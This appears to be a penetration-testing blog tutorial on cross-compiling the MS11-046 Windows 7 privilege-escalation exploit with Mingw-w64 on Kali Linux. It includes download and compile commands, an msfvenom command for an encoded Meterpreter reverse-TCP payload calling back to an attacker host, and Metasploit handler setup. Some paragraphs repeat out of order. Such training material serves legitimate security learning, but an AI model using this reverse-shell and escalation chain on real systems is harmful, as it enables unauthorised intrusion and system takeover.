How to compile Windows exploits on Kali Linux 3 (Mingw-w64)
Microsoft Windows still holds the largest market share when it comes
to operating systems for desktop computers, both for enterprise use and
personal use. Therefore it is highly likely you will encounter a lot of
Windows workstations and servers during your penetration testing
training and career. On the other hand, most penetration testers mainly
use Linux based distributions such as Kali Linux, Pentoo or Backbox.
Therefor you need the ability to quickly compile Windows exploits on
your Linux machine. The solution for this is: Mingw-w64.
Mingw-w64 is a free and open source software development environment for creating Windows applications. Mingw-w64 was originally called Mingw32 which didn’t support the 64 bit architecture. In this tutorial we will be looking at how to use Mingw-64 to compile exploits for Windows on Kali Linux. Let’s start with installing Mingw-w64 on Kali Linux.
Type y for yes to confirm and continue the Mingw-w64 installation
process. Downloading and installing Mingw-w64 may take a little while to
complete.
http://docs.kali.org/general-use/kali-linux-sources-list-repositories
With the right repositories in the sources.list file you need to run apt-get update and then run the installation command for the Mingw-w64 package again.
Let’s start with downloading the exploit from Exploit-db:
To transfer the exploit to the target host we will be serving it with
the build-in Apache webserver. The last 2 commands will copy exploit to
the Apache home directory and start the Apache webserver.
When we download and execute the exploit from cmd.exe it will look like this:
As we can see the whoami command returns a privileged user before
executing the exploit and system user after. This exploit actually
spawns a new shell in the current shell where it was launched from
instead of a new shell in a new window. This means we can also run this
exploit from command line shell, such as Meterpreter. Let’s see how we
can run the exploit from a Meterpreter session.
The best way to deal with compilation errors is to read them carefully and then search Google for solutions. Often you’re not the first and only person facing a certain compilation error and therefore it is not necessary to reinvent the wheel. Online resources such as stack exchange often provide you with possible solutions for the most common compilation errors.
Use the following command to create the payload using Msfvenom:
Than download the exploit to the target host and execute it. If
everything was setup correctly you should receive a reverse Meterpreter
shell on the msfconsole:
Next type shell on the Meterpreter command line and run the privilege
escalation exploit to escalate the shell to a system shell:
As you can see the shell goes from the privileged test user shell to a
system shell. Please note that a new system shell is spawned in the
shell where it was executed from. Therefor we cannot see the exploit
output as it is in the old shell with limited privileges.
You can verify this by typing Exit which will exit the system shell and return you to the user shell which still contains the Windows 7 privilege escalation exploit output:
Mingw-w64 is a free and open source software development environment for creating Windows applications. Mingw-w64 was originally called Mingw32 which didn’t support the 64 bit architecture. In this tutorial we will be looking at how to use Mingw-64 to compile exploits for Windows on Kali Linux. Let’s start with installing Mingw-w64 on Kali Linux.
Installing Mingw-w64 on Kali Linux
Mingw-w64 is not installed by default on Kali Linux 2016.2 and earlier version. Therefore we need to install it first before we can compile Windows exploits on Linux. Run the following commands to install Mingw-w64:apt-get update
apt-get install mingw-w64
Use apt-get install mingw-w64 to install Mingw-w64 on your Kali host.
Unable to locate package mingw-w64
Sometimes you get a Unable to locate package mingw-w64 error when trying to install the mingw-w64 package and get something like:root@kali:~# apt-get install mingw-w64To solve this issue make sure you have the right repositories in the sources.list file. You can edit the file using nano:
Reading package lists… Done
Building dependency tree
Reading state information… Done
E: Unable to locate package mingw-w64
/etc/apt/sources.listMake sure you have the correct repositories in this file. You can find the repositories for different versions of Kali Linux on the following page:
http://docs.kali.org/general-use/kali-linux-sources-list-repositories
With the right repositories in the sources.list file you need to run apt-get update and then run the installation command for the Mingw-w64 package again.
Cross compiling Windows exploits with Mingw-w64
Now that we have Mingw-w64 installed we can start to compile Windows exploits on Kali Linux. For this tutorial we will be compiling a Windows exploit written in c to exploit CVE-2011-1249 (MS11-046) vulnerability in Windows 7 SP0 x86. This version of the Windows operating system contains a vulnerability in the Ancillary Function Driver (AFD) which allows an elevation of privilege for an authenticated non administrative user. Even though Mingw-w64 was developed for the much needed 64 bit support we can also compile 32 bit Windows exploits. Let’s have a look at how we can compile 32 bit Windows exploits.Let’s start with downloading the exploit from Exploit-db:
wget ‐‐output-document= 40564.c https://www.exploit-db.com/download/40564Use the following command to compile the afd.sys exploit for Windows 32 bit:
i686-w64-mingw32-gcc [input file: source]–o [output file: .exe]–lws2_32The following command will compile the Windows 7 afd.sys privilege escalation exploit:
i686-w64-mingw32-gcc 40564.c –o exploit.exe –lws2_32
Compile the Windows exploit.
When we download and execute the exploit from cmd.exe it will look like this:
The exploit executed successfully.
Exploit compilation errors
When compiling exploits for different architectures and operating systems many errors can occur. There are a lot of variables which can cause the compilation to fail, such as: syntax, libraries, host and target architectures, installed software used for compiling code and a lot more. Some errors may be easy to fix and some are not. It is also important to distinct warnings from fatal errors since warnings may just indicate something like deprecated functions which do not prevent the exploit from working. Fatal errors do prevent the exploit from working and therefor need to be fixed.The best way to deal with compilation errors is to read them carefully and then search Google for solutions. Often you’re not the first and only person facing a certain compilation error and therefore it is not necessary to reinvent the wheel. Online resources such as stack exchange often provide you with possible solutions for the most common compilation errors.
Exploit MS11-046 from a Meterpreter shell
Let’s quickly generate a Windows 32-bit Meterpreter reverse TCP payload using Msfvenom and execute it on the target host. We will be using the multi handler in Metasploit to catch the reverse shell.Use the following command to create the payload using Msfvenom:
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=[IP attackbox] LPORT=4444 -e x86/shikata_ga_nai –f exe –o exploit.exeBe sure to replace the listening host IP and if necessary the listening port. Now start msfconsole and run the following commands to set up the multi handler exploit:
use exploit/multi/handler
set lhost [listening host IP]
set lport 4444
run
Start the reverse TCP handler on port 4444.
The target host connects back to the Kali box.
The privilege escalation exploit executed successfully through our Meterpreter sessions.
You can verify this by typing Exit which will exit the system shell and return you to the user shell which still contains the Windows 7 privilege escalation exploit output:
The exploit output on the privileged user shell.
Post a Comment